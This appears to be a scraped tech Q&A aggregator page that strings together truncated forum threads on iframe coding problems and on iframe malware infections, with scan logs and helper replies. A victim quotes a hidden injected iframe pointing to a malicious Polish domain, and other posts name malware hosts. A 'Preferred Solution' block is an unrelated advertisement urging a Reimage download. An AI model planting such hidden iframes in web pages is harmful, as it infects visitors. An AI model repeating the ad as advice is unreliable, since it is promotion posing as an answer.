Over 1 million tech questions and answers.

New Firefox iFrame Bug

Q: New Firefox iFrame Bug

Hi Folks,From threatpost :New Firefox iFrame Bug Bypasses URL Protections. http://bit.ly/as6VH9CheersKarstenHansen

Read other answers
RELEVANCY SCORE 200
Preferred Solution: New Firefox iFrame Bug

I recommend downloading and running Reimage. It's a computer repair tool that has been proven to identify and fix many Windows problems with a high level of success.

I've used it in the past to identify and fix everything from blue screens (BSOD's), ActiveX errors, corrupt files and processes, dll/exe/sys errors, recover lost memory, Windows update problems, defragging, malware removal etc.

You can download it direct from this link http://downloadreimage.com/download.php. (This link will automatically start a download of Reimage that you can save to your computer.)

RELEVANCY SCORE 56.4

New Firefox iFrame Bug Bypasses URL Protections.

There is a newly discovered vulnerability in Mozilla's flagship Firefox browser that could enable an attacker to trick a user into providing his login credentials for a given site by using an obfuscated URL. In most cases, Firefox will display an alert when a URL has been obfuscated, but by using an iFrame, an attacker can evade this layer of protection, possibly leading to a compromise of the user's sensitive information.Click to expand...

As seen In comments at above link:
This is not limited to Firefox I have seen it in ie8 and it causes the browsers to freeze. The conections are mail and facebook. It has been going on for 2 weeks to my knowledge.Click to expand...

-- Tom
 

Read other answers
RELEVANCY SCORE 55.2

Hi Guys,

I have a problem with my computer.
looks i have a virus/malware inside my computer. I have to try to restore using system restore, seems i doesn't work.

This kind of <iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe> infected all of my HTML/PHP/ASPX files in my computer.
I had to try to delete it using notepad, but when i open it again. it still there.

Can sombody please help me, cause i still had a lot of work must be finished monday, and i can't continue to work if my computer still behave like this.

Here is log file using DDS i created to you guys. Thanks for your help

A:<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

Hello and welcome to Bleeping ComputerWe apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here.If you have since resolved the original problem you were having, we would appreciate you letting us know. If not please perform the following steps below so we can have a look at the current condition of your machine. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far.Upon completing the steps below another staff member will review and take the steps necessary with you to get your machine back in working order clean and free of malware.If you have already posted a DDS log, please do so again, as your situation may have changed.Use the 'Add Reply' and add the new log to this thread.Thanks and again sorry for the delay.We need to see some information about what is happening in your machine. Please perform the following scan:Download DDS by sUBs from one of the following links. Save it to your desktop.DDS.comDDS.scrDDS.pifDouble click on the DDS icon, allow it to run.A small box will open, with an explaination about the tool. No input is needed, the scan is running.Notepad will open with the resul... Read more

Read other 2 answers
RELEVANCY SCORE 38.8
Q: iframe

How do clear the iframe in netscape 7.0 and Internet explorer. The following code works in IE but not in netscape

<html>
<head>
<title>Simple Math Practice</title>


<script language="javascript" type="text/javascript">
<!-- Hide Script
function RandPosInt() {
Rnum = Math.round(Math.random()*8+1);
return Rnum;
}

function WriteHeader() {
problem.document.write('<html><head><link href="math.css" rel="stylesheet" type="text/css"><\/head><body>');
}

function WriteContent() {
problem.document.write("this is content");
}

function WriteFooter() {
problem.document.write("<\/body><\/html>");
}

function ClearFrame() {
problem.document.open();
problem.document.clear();
}

function CloseFrame() {
problem.document.close();
}


// End Hiding Script -->
</script>


<link href="math.css" rel="stylesheet" type="text/css">
</head>
<body>
<div align="center">
<h1>Simple Math Practice</h1>

<iframe
src="defaultframe.html" id="problem" name="problem" frameborder="1" marginwidth="10" marginheight="10" scrolling="no" align="top" height="200" width=&quo... Read more

A:iframe

That function is no longer supported. See here:
http://www.web-developer-india.com/web/jscript/refp_77.html
 

Read other 1 answers
RELEVANCY SCORE 38.8

I am working on a site using an IFrame. It is a copy of another site I have using the same IFrame. In the original site the homepage shows up on load but on the reworked site it loads the home page and then it disappears. I am using IE to view these pages.

A friend said he looked at the site in FireFox and it works correctly, so it leads me to believe it may be an IE thing but the original site works fine in IE.

I am out of ideas here. HELP!
 

A:IFrame help

post the sites url and I will check out the code....... if I can see it.

d.
 

Read other 2 answers
RELEVANCY SCORE 38.8

Still I frame. I have an Iframe on my site and I wanted to show only a certain part of the site inside it and unscrolable too. Can I tell the browser(s) to do this? and how. Please help.
 

A:Still Iframe - Please Help

Read other 12 answers
RELEVANCY SCORE 38.4

I have just had 3 securtiy alert messages from AVIRA,don't know if it would have any connection :
C:\users\XXXX\AppData\Local\Microsoft\...\b(1).js contains suspiscious code HEUR/HTML. malware, the same version b(2)
and detection pattern of the java script virus JS/Dldr.Iframe.BO
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 20:04:02, on 22/06/2008
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v7.00 (7.00.6001.18000)
Boot mode: Normal

Running processes:
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktop.exe
C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\Program Files\Windows Live\Family Safety\fssui.exe
C:\Program Files\TalkTalk\bin\sprtcmd.exe
C:\Program Files\Google\Google Desktop Search\GoogleDesktopIndex.exe
C:\Windows\System32\rundll32.exe
C:\Program Files\COMODO\Firewall\cfp.exe
C:\Program Files\Avira\AntiVir PersonalEdition Classic\avgnt.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Windows\ehome\ehtray.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\Common Files\Nero\Lib\NMBgMonitor.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Program Files\Windows Live\Messenger\msnmsgr.exe
C:\Program Files\Microsoft Office\Office12\ONENOTEM.EXE
C:\Windows\System32\rundl... Read more

A:JS/Dldr.Iframe.BO

Read other 6 answers
RELEVANCY SCORE 38.4

I m tired of searching about iframe alternative ..... after so much search i cant get what i wanted .

I m trying to include other domain HTML page in my HTML based email templates, Is there any other way to include the html pages from other domain in my HTML coding that is other than iframe?
 

Read other answers
RELEVANCY SCORE 38.4

On my site, I have darkish colors; blue, grayish-black, etc. But I have an IFRAME of a page from another site, which has white background and black text, so it doesnt fit in with my page. I already have the CSS for my page colors, can I apply this to the Iframe, or is there another way I can change its background color?

Since the Iframed page is on someone else's site, I can not modify that file itself. And many of you will probably tell me an iframe is not good to use in page design, I have decided its the best way to accomplish what I want.
 

A:Formatting an IFRAME

if you know this person and they're okay with you mirroring their site, you could ask them to use DIV id's and SPAN id's and set their tags to CSS id's that you know of, then name your CSS id's the same. you'd have to put a LINK REL tag in the HEAD and both you and the person who owns the site would need to have it point to CSS in the main directory with the same file name. everything would have to correlate.
 

Read other 2 answers
RELEVANCY SCORE 38.4

My PC was working very well and had no problem. I turned off after my work one night and when I switched on the next morning it does not open my home page. When I try to open my antivirus Avast gives me warning. The name of the virus is HTML:Iframe-inf Please help me to get rid of this. I am not able to ope my home Page.
More over my system has become very slow especially during the start up. Please help.
Thank you!

Read other answers
RELEVANCY SCORE 38.4

Hello Gracious Help,I run XP Pro on a Pentium 4, 3ghz (Dell GX270).3 days ago, I had my Firefox browser open, but had not used it or been at the puter for about 5 hours. When I sat down at the puter, there were perhaps 10 Avast warning pop-ups within about 15 mins - that said that it had blocked me from opening a malicious site. The trouble was, I was not trying to open any sites at this time. Two of the sites it specified were a beastiality site and a zoo site - neither of which I have ever been to.Avast seemed to block my browser from opening these sites, but my question is - what was directing my browser to go to them in the first place? The Avast warning said that the virus (or malware) that it was protecting me from was HTML:Iframe-infA web search came up with a few complex suggestions on how to rid of fix this problem, but all were too complex for me to follow.The hijacking or redirecting (or whatever it was) has not happened again since. I have had no further Avast warnings over the last 2 days. I first looked for help from the Avast website, and spoke to an IYogi support rep on the phone (whose number I got from the Avast website). He took remote control of my puter, checked my registry and said he could help if I bought a $186.00 support pkge (that provided support for 6 months). In retrospect, the "Help for Avast Free" phone number is just a marketing ploy to sell support packages. I just hope the guy did not add spyware or key loggers (or such... Read more

A:HTML : Iframe - inf

Hello again,

Today I had the same problem again. When Avast kept giving me warnings and notifications that it has protected me from going onto malicious websites (even when I wasn't surfing), I pushed "More Info" button on the Avast pop-up, which took me to the Avast webpages that explained more about the infection (and attempted browser hijackings or re-direction, or whatever it is).

I did this for two Avast warning pop-ups (that tried to take me to two different malicious sites). Below are the URL's to the two Avast webpages that opened, when I clicked the "more info" button on the warning pop-up:

hxxp://www.avast.com/en-ca/lp-security-information-fp2?p_ext=0&utm_campaign=Virus_alert&utm_source=prg_fav_60_0&utm_medium=prg_systray&utm_content=.%2Ffa%2Fen-ca%2Fvirus-alert-challenger2&p_vir=html:Iframe-inf&p_prc=file://C:\Program%20Files\Common%20Files\ComObjects\update.exe&p_obj=http://www.allzoomovies.com/?x=4302&p_var=.%2Ffa%2Fen-ca%2Fvirus-alert-default2&p_pro=0&p_vep=6&p_ves=0&p_lqa=0&p_lsu=24&p_lst=0&p_lex=162&p_lng=en&p_lid=en-ca&p_elm=7&p_vbd=1367
hxxp://www.avast.com/en-ca/lp-security-information-fp2?p_ext=0&utm_campaign=Virus_alert&utm_source=prg_fav_60_0&utm_medium=prg_systray&utm_content=.%2Ffa%2Fen-ca%2Fvirus-alert-challenger2&p_vir=html:Iframe-inf&p_prc=file://C:\Program%20Files\Common%20Files\ComO... Read more

Read other 41 answers
RELEVANCY SCORE 38.4

Description of my problem:We determine in our local network an instability, this is due to spread of malware through in it.The malware uses the method of attack based ARP to the local network Gateway (192.168.1.1).Indeed machine "A" owner of the MAC address "MacA" send packages ARP broadcast on the network indicating that the bridge is the machine A (192.168.1.1(the right address of Gateway) is at "MacA"), so many machines in our network used a wrong ARP i(I mean MACA of infected machines by this malware)After a long check on them to identify this malware. we found : these machines were infected by:svchost.exe" (175 KO, 179200 Bytes) uses the DLL Packet.dll and wpcap.dll and wanpacket.dll ... \ drivers \ npf.sys.- There realize a scan of all networks 192.168- and 172.16- and 10.0-- It has a "80-port insert" in the svchost paquet-at last we have another problem; when we open web page (as IE or Firefox) before we get the response and taking two or three seconds, the page displays a little gray bare (even we use windows or Linux system) and the view page source return this hxxp://218.75.91.248/iframe and this are included in the svchost.exe paquet but it was crypted.- Can somebody help me and explain me haw can we resolve this and clean our local network from this malwre? Thank's in advance

A:Iframe And Arp Spoofing

Please can somebody help me, nobody has an idea about this problem ?

Read other 4 answers
RELEVANCY SCORE 38.4

I have a page index.shtml, and there is an iframe in that page. The iframe is called downloadiframe. Now I have a button in my forums that I want to link to my downloads page.

Here's My problem. When you click the "download" button on my page, you go into my downloads page. But I want it to open index.shtml with the downloads page in the iframe, downloadsiframe. How do I do this?
 

A:IFrame Problems

Read other 8 answers
RELEVANCY SCORE 38.4

on my site i have a link i use for users to view tax records in my county and i would like to have the users not leave my site,so i used an iframe,but im havin an issue after agreeing to their usage terms,users cannot access the site or it doesnt redirect to the corresponding/next page,as in enter here and i cant bypass it because it will auto redirect. any suggestions WITHOUT using a new page or opening in a new window ??

www.townhousesandvillas.com/taxrecords.html

oh and take it easy on me...im new
 

A:iframe or equal...

Read other 16 answers
RELEVANCY SCORE 38.4

I receive frequent emails from my friend's infected computer with random subject lines and random names with his files as an attachment.

Now, the problem is my AVG antivirus and Housecall do not detect any virus in these emails, but pandaactivescan detects this as "Exploit/iFrame".

I have XP pro, IE6 and Outlook express6 and have even installed the patch for this vulnerability that actually affects IE5.5 and IE5.01 only(http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-020.asp).

IS my computer infected?
 

A:Exploit/iFrame

Read other 9 answers
RELEVANCY SCORE 38.4

Alright here the deal i have a transparent iframe with the content visable but the scrollbars are transparent and i dont want that...so is there anyway to have a transparent iframe with visable content and visable scrollbars?
 

A:Transparent iFRAME

Read other 12 answers
RELEVANCY SCORE 38.4

OS: Server 2008 R2 - SP1

IIS: 7.5.7600.16385

I have an iframe embedded into a web page which displays a pdf.  In chrome and other browsers the pdf displays fine inside the iframe; however, in IE the iframe forces a logout after redirecting them several times.  Chrome also does this redirect
but doesn?t end up forcing a logout.  Copying the source url from the iframe into a new tab in IE doesn?t force the logout and retrieves the pdf just fine which means it is directly related to this server?s handling of iframes specifically in all IE browsers
we support (IE 9+).  This scenario is unique to a specific server and doesn?t happen on ?identical? server environments.

I have used Process Monitor and am not seeing any permission errors or anything that immediately stands out.  If you have any thoughts on how to proceed or have any questions, please let me know.
I have also looked into KB 3154070 without success.

Read other answers
RELEVANCY SCORE 38.4

I already ran ComboFix before I found the preparation guide saying not to unless instructed - oops.

Iframe.inf infected my sites at Hostgator which they cleaed up overnight. I'm impressed.

Hostgator tech suggested scanning local system using multiple scanners for better results. I use Avast Internet Security and it reported no problems.

Is ComboFix log is enough to tell if infected or do I need to go through all the stuff listed in prep guide.

thanks in advance for any help you can render

ComboFix log below

ComboFix 11-03-11.02 - STAN 03/12/2011 16:09:45.3.1 - x86
Microsoft Windows XP Professional 5.1.2600.3.1252.1.1033.18.1014.544 [GMT -5:00]
Running from: c:\downloads\Software\ComboFix.exe
AV: avast! Internet Security *Disabled/Updated* {7591DB91-41F0-48A3-B128-1A293FD8233D}
FW: avast! Internet Security *Disabled* {7591DB91-41F0-48A3-B128-1A293FD8233D}
* Created a new restore point
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\~DFK69783e.tmp
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\1eaadjc.dll
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\bass.dll
c:\documents and settings\STAN.STANCOMPUTER\Application Data\Microsoft\engine_vx.dll
c:\doc... Read more

A:Iframe.inf infected - yes or no?

Hello and welcome to Bleeping Computer We apologize for the delay in responding to your request for help. Here at Bleeping Computer we get overwhelmed at times, and we are trying our best to keep up. Please note that your topic was not intentionally overlooked. Our mission is to help everyone in need, but sometimes it takes just a little longer to get to every request for help. No one is ignored here. Please take note: If you have since resolved the original problem you were having, we would appreciate you letting us know. If you are unable to create a log because your computer cannot start up successfully please provide detailed information about your installed Windows Operating System including the Version, Edition and if it is a 32bit or a 64bit system.
If you are unsure about any of these characteristics just post what you can and we will guide you.Please tell us if you have your original Windows CD/DVD available. If you are unable to perform the steps we have recommended please try one more time and if unsuccessful alert us of such and we will design an alternate means of obtaining the necessary information. If you have not done so, include a clear description of the problems you're having, along with any steps you may have performed so far. Upon completing the steps below another staff member will review your topic and do their best to resolve your issues. If you have already posted a DDS log, please do so again, as your situation may have changed. Use the '... Read more

Read other 3 answers
RELEVANCY SCORE 38.4

Hi,
I work on portals. In ePhox editLive editor I am using iFrame which in turns diplay a intranet site with in this iFrame. This site includes a selectbox for locations. When site is displyaed first time select box is not visible to end user but when we click on any button and this page again renders this select box is also available.
I right click on site when select doesnt appears but for my surprize code for select box is there in view source. I am not getting why it is not visible if code is there in view source.
Also, When I open this site in internet explorer without any iframe select box is visible there.

Can anyone please help why it is happening like that??

Regards,
Rohit Sharma

Read other answers
RELEVANCY SCORE 38.4

Avast antivirus is reporting that a number of files have been infected with a trojan called "IFrame-HW [Trj]". It seems to move around to different files, I use Windows Vista and some of the files infected are in hidden folders which I can no longer seem to access. Also, when I tell Avast to move the files to it's chest or to delete they just seem to come right back, sometimes immediately. I'm not sure what effect it is having on my pc, except Mozilla Firefox will no longer function on my pc, I can only browse the net with IE or Opera.
I have also tried using Cyberscrub to clear my free space after deleting infected files, but when I do so I get constant reports of the infection from Avast and Cyberscrub stops responding.
Any help will be greatly appreciated.
DDS (Ver_09-06-26.01) - NTFSx86
Run by olusanya at 16:37:47.03 on Thu 07/09/2009
Internet Explorer: 8.0.6001.18783
Microsoft? Windows Vista™ Home Premium 6.0.6001.1.1252.1.1033.18.2814.1528 [GMT -4:00]

SP: Spybot - Search and Destroy *disabled* (Updated) {ED588FAF-1B8F-43B4-ACA8-8E3C85DADBE9}
SP: Windows Defender *enabled* (Updated) {D68DDC3A-831F-4FAE-9E44-DA132C1ACF46}

============== Running Processes ===============

C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k rpcss
C:\Windows\System32... Read more

A:Infected with IFrame-HW [Trj]

Pardon me... I left out the fact that it also seems to have disabled the protective mode of IE, leaving it vulnerable.Hello nu2cpu,We ask that once you have posted your log and are waiting, please DO NOT "bump" your thread or make further replies until it has been responded to by a member of the HJT Team. The reason we ask this or do not respond to your requests is because that would remove you from the active queue that Techs and Staff have access to. The malware staff checks the forum for postings that have 0 replies as this makes it easier for them to identify those who have not been helped. If you post another response, there will be 1 reply. A team member, looking for a new log to work may assume another HJT Team member is already assisting you and not open the thread to respond.That is why I have made an edit to your last post, instead of a reply. Please do not multiple post here, as that only pushes you further down the queue and causes confusion to the staff.Please be patient. It may take a while to get a response but your log will be reviewed and answered as soon as possible.Thank you for understanding.Regards,The weatherman (Moderator)

Read other 3 answers
RELEVANCY SCORE 38.4

In the last week, my computer has started having issues and restarting randomly.  When I try to maximize some videos on youtube, occasionally the video will only cover 1/3 of the screen and immediately freeze.  Avast said everything was good, but I tried a boot scan anyway; it would pop up and identify some infected files, but when I told it to fix them, it would say those files are no longer there.  I can't find the text file that avast apparently made, but I do remember clickjacker and a frame flashing across the screen.  I'd appreciate any help you could give in clearing this up.  
 
DDS (Ver_2012-11-20.01) - NTFS_AMD64 
Internet Explorer: 11.0.9600.16518  BrowserJavaVersion: 10.51.2
Run by Josh at 0:33:52 on 2014-02-23
Microsoft Windows 7 Home Premium   6.1.7601.1.1252.1.1033.18.16382.14153 [GMT -6:00]
.
AV: avast! Antivirus *Enabled/Updated* {17AD7D40-BA12-9C46-7131-94903A54AD8B}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: avast! Antivirus *Enabled/Updated* {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
.
============== Running Processes ===============
.
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\W... Read more

A:Iframe, clickjacker?

Hi Fajen
My name is polskamachina and I will be assisting you with your malware problems. What follows below are some ground rules for this forum.
I will reply as soon as possible (typically within 24-48 hours). In turn, I ask that you please respond within 72 hours. If you know you will be away longer than that, please let me know.
I am in California at GMT-8 Hours (Pacific Standard Time). If I do not respond to you within 48 hours, feel free to send me a private message.
Some points for you to keep in mind:
Do NOT run any tools unless instructed to do so.
We ask you to run different tools in a specific order to ensure the malware is completely removed from your machine, and running any additional tools may detect false positives, interfere with our tools, or cause unforeseen damage or system instability.
Do not attach logs or use code boxes, just copy and paste the text.
I cannot see your computer. Periodically update me on the condition of your computer, and provide as much detail as you can in every post.
Once things seem to be working again, please do not abandon the thread. I will give an "all-clean" message at the very end.
NOTE: Backup any files that cannot be replaced. Removing malware can be unpredictable and this step can save a lot of heartaches if things don't go as planned. You can put them on a CD/DVD, external drive or a flash drive, anywhere except on the computer.
NOTE: It is good practice to copy and paste the instructions into notepad and print them in ca... Read more

Read other 22 answers
RELEVANCY SCORE 38.4

ok.... so what i want to do is have an iframe over top of an image (which i have figured out), but then, i want that iframe to have a lower opacity so that you can kind of see the picture that the iframe is over top of. i've read a ton of stuff about transparency and opacity and i've tried a few different things, none seem to work though. i've been able to change the opacity of the iframe fine, but rather than having my image come through, the bg color (which is black) comes through.

please help and thanks in advance

carson

ps - think of it like a layer in photoshop where you can just change the opacity to have the layer behind it show through.
 

A:Need help with iframe opacity...

well I am not too sure, but I think you would have to change the alpha opacity in the code for the page within the iframe. So if your iframe is linkted to "pagename.htm" then you have to use alpha opacity on the "pagename.htm" page, as opposed to the page including the iframe. However, I may be way off track on this one! This is all I can offer is an idea...
 

Read other 2 answers
RELEVANCY SCORE 38.4

I have searched posts here for other virus help and have downloaded the Malwarebytes that was suggested and will put copy on the infected computer. I have run my Avast Antivirus and the OneCare but still have problems.QUESTIONS:1-Does this Malwarebytes program have any problems with other Antivirus progams running?2-Will this program get rid of the iframe virus? 3-I noticed a strange program in my msconfig StartUp it was named freddy42 I have disabled it. I have checked and now know it is part of this virus. 4-Should I have diabled freddy 42? I think that is why I may be still infected.5-Do I need to have all programs enabled in my StartUp to ensure complete virus removal.6- Can the infected computer infect laptop, it is on shared network? I have disabled all sharing folders and files with infected computer.I took a picture of the message as it is loading the bogus page. It says: waiting for res://ieframe.dll/dnserrror.htm. I can't log on anywhere to get more info or help so I am using my laptop now to get work done....

A:IFrame Virus

In answer to question onePrograms that monitor and prevent registry changes such as Spybot S&D Teatimer function and Winpatrol need to be disabledIn answer to number two post a log and we'll take it from thereDisable freddy42 using Autorunshttp://technet.microsoft.com/en-us/sysinte...s/bb963902.aspxNumber 5 - noNumber 6 - yesAre you using a digital picture frame? Whatever USB attachment it is, do not use it right nowI'm moving this to AII-----------------------------------------------------The process of cleaning your computer may require you to temporarily disable some security programs. If you are using SpyBot Search and Destroy, please refer to Note 2 at the bottom of this page.Please download Malwarebytes Anti-Malware and save it to your desktop.alternate download link 1alternate download link 2Make sure you are connected to the Internet.Double-click on mbam-setup.exe to install the application.When the installation begins, follow the prompts and do not make any changes to default settings.When installation has finished, make sure you leave both of these checked:Update Malwarebytes' Anti-MalwareLaunch Malwarebytes' Anti-MalwareThen click Finish.MBAM will automatically start and you will be asked to update the program before performing a scan.If an update is found, the program will automatically update itself.Press the OK button to close that box and continue.If you encounter any problems while downloading the updates, manually download them from here and just double-... Read more

Read other 6 answers
RELEVANCY SCORE 38

I have my website by name:padasalgi.tripod.com since 11 years.Today when I tried to goto my site I am getting the following alert message and connection to any files in this url are disconnected. I am very much afraid since the contents of my webpages could not be surfed by any one due to this malware.I am quite new to the malware/worms etc I humbly request will any one please advise and guide me how this malware virus could be removed. The details of the malware alert are as under:avast!WarningA Virus Was Found!There is no reason to worry,though avast! has stopped the malware before it could enter your computer.When you click on the "Abort connection" button, the download of the dangerous file will be cancelled.File name: http://padasalgi.tripod.com/\{gzip}Malware name :HTML.Iframe-infMalware type : Virus/WormVPS version : 091227-0,12/*27/2009I once again request everybody please help me in removing this virus.

Read other answers
RELEVANCY SCORE 38

Problem: I upload to websites from work, home, and satellite office. I installed Filezilla FTP program to upload to all three locations about 3 months ago. Mid-June, my websites started indicating they were virus-infected when opening them up through a browser. At work I have McAffee Anti-Virus and at home I use AVAST. The AVAST is telling me I have a Trojan HTML:IFrame-HY [Trj]. From what I have read with the Filezilla problem, the iframe injects into the index pages of a website. On my index.html page, it creates a frame or space that causes my page to appear jumbled. On the index.php pages of my company site, it causes a PHP error message (I have a php calendar and a php quiz).

I tried uploading over these (through my file manager online) and the errors came back. I went online through my webhost and opened the files up through the file manager, deleted the code and pasted in what I thought was good code for the php pages. I did see injected code on this page before I deleted it and made a copy of it. This seems to have worked for the php index pages but my index.html page is still throwing virus warnings ? I can?t see any injected code in that page.

For what I understand about the Filezilla, it doesn?t protect the FTP passwords. I have another small website I work from home on and I deleted all of the files through the file manager online and uploaded what I believed to be cleaned files after changing my FTP passwords. When I previewed it in the bro... Read more

A:trojan HTML:IFrame-HY

bumping

Read other 1 answers
RELEVANCY SCORE 38

I recently went to a website and my NOD32 came up with a Iframe.b.gen warning.
I immediately did a full scan on my computer and found nothing, but it would put my mind at rest if someone could have a look at my log files.

I ran gmer but the text files came up blank

.
DDS (Ver_11-03-05.01) - NTFS_AMD64
Run by Darren at 21:13:27.69 on 24/03/2011
Internet Explorer: 8.0.7600.16385 BrowserJavaVersion: 1.6.0_24
Microsoft Windows 7 Home Premium 6.1.7600.0.1252.44.1033.18.6135.4461 [GMT 0:00]
.
AV: ESET NOD32 Antivirus 4.2 *Enabled/Updated* {77DEAFED-8149-104B-25A1-21771CA47CD1}
SP: ESET NOD32 Antivirus 4.2 *Enabled/Updated* {CCBF4E09-A773-1FC5-1F11-1A056723366C}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ===============
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Program Files\NVIDIA Corporation\Display\NvXDSync.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\nvvsvc.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Program Files\ESET\ESET NOD32 Antivirus... Read more

A:Iframe.B.gen virus warning

Hello and Welcome to TSF.

Please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.

Please note that the forum is very busy and if I don't hear from you within three days this thread will be closed.

------------------------------------------------------

I'm not seeing anything in your logs. We'll do an online scanner to check for remnants shortly.

------------------------------------------------------

Advanced SystemCare

We do not recommend the use of registry cleaners. Our colleague miekiemoes has an excellent writeup here

We suggest uninstalling them via Programs and Features in your Control Panel.

------------------------------------------------------

Please uninstall the following via Start->(or Computer)->Control Panel->Programs->Programs and Features if it still exists:

Coupon Printer for Windows<<Please read here

If you decide to uninstall it, also delete the following Folder if it still exists:

C:\Program Files\Coupons

------------------------------------------------------

Please run this online scan to help look for remnants. Ensure your external and/or USB drives are inserted during the scan.

In 64-bit Windows Vista/Win7, you must open the 64-bit IE browser.

Navigate to C:\Program Files (x86)\Internet E... Read more

Read other 2 answers
RELEVANCY SCORE 38

I hit a website and the browser crashed. I noticed that things started acting wacky after that happened so I jumped on a mac to look at the source of the page. I found someone had injected javascript that opened an iframe and redirected to an 81.x.x.x site in panama. Here's the log. The scary line for me is :O4 - HKLM\..\Run: [xxy_Shell] C:\Documents and Settings\JDOE\xxy_rawv.exe

I've cleaned the files with McAfee but not sure where to go from here other than wiping the drive. I also know exactly when it hit so could I use the XP resetore? Any ideas are greatly appreciated.

Logfile of Trend Micro HijackThis v2.0.0 (BETA)
Scan saved at 3:46:07 PM, on 4/20/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\ngvpnmgr.exe
C:\Program Files\Cisco Systems\SSL VPN Client\agent.exe
C:\Program Files\Juniper\NetScreen-Remote\IreIKE.exe
C:\WINDOWS\System32\WLTRYSVC.EXE
C:\WINDOWS\System32\bcmwltry.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\cisvc.exe
C:\WINDOWS\system32\inetsrv\inetinfo.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\Juniper\NetScreen-Remote\IPSecMon.exe
c:\program files\mcafee.com\agent\mcdetect.exe
c:\PROGRA~1\mcafee.com\vso\mcshield.exe
c:\PROGRA~1\mcafee.com\agent\mctskshd.exe
c:\PR... Read more

A:HJT log after iframe/redirect to Panama

Hi and welcome to TSF.

Apologies for any delay in replying, but we have been rather busy lately, and, of course, all our helpers are volunteers.

Since it has been a few days since you first posted, please follow these instructions if you still need assistance.

Download Deckard's System Scanner (DSS) to your Desktop . Note: You must be logged onto an account with administrator privileges.Close all applications and windows.
Double-click on dss.exe to run it, and follow the prompts.
When the scan is complete, two text files will open - minimised > extra.txt and maximised > main.txt.
Copy (Ctrl+A then Ctrl+C) and paste (Ctrl+V) the contents of main.txt back in this thread (do not attach it).
Please attach extra.txt to your post.


To attach a file to a new post, simplyClick the[Manage Attachments] button under Additional Options > Attach Files on the post composition page, and
copy and paste the following into the "Upload File from your Computer" box:C:\Deckard\System Scanner\extra.txt

Click Upload.

I will monitor this thread for your reply.

Thank you for your patience.

Read other 1 answers
RELEVANCY SCORE 38

So, sometimes, i go onto the facebook main page, and avast 5 alerts me of hxxp://updateinfo22.com/info.js A Facebook: HTML:IFrame-HH [Trj] virus. Is it a false positive or a real virus.

A:Facebook: HTML:IFrame-HH [Trj]

Hi,Sorry for the delay in replying to your topic.Performing a quick Google search reveals that the update22 domain has been reported as a malware domain. As such;Please download Malwarebytes Anti-Malware (v1.44) and save it to your desktop.Download Link 1Download Link 2MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (ie Spybot's Teatimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.Make sure you are connected to the Internet.Double-click on mbam-setup.exe to install the application.
